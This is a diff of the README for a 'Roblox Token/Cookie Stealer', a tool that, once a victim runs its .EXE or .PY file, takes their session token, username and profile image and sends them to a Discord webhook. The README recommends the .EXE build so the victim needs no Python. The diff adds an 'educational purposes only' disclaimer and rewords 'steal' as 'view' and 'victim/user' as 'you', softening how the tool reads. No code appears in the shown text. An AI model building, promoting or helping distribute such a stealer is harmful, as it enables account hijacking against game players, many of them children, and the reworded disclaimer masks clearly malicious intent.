TGOBased/RobloxTokenStealer/README.md

+# DISCLAIMER: EDUCATIONAL PURPOSES ONLY!
+Using any programs for malicious intent can result in serious legal consequences.
+Ensure you are abiding by the laws of your jurisdiction and government

 # Roblox Token/Cookie Stealer!

-What it can do - It can steal a users token, username, and profile_image once the .EXE or .PY file is ran, and it sends it to a Discord Server.
+What it can do - It can view a users token, username, and profile_image once the .EXE or .PY file is ran, and it sends it to a Discord Server.

 # COOL FEATURES - If an error is to occour, it will be sent to DISCORDWEBHOOKURL_ERROR.

 # What I recomend - I recomend, having the .EXE version.
-It wont require the victim/user to install any librarys, or Python.
+It wont require you to install any librarys, or Python.
 Here is the documentation - https://pypi.org/project/auto-py-to-exe/

  Setup -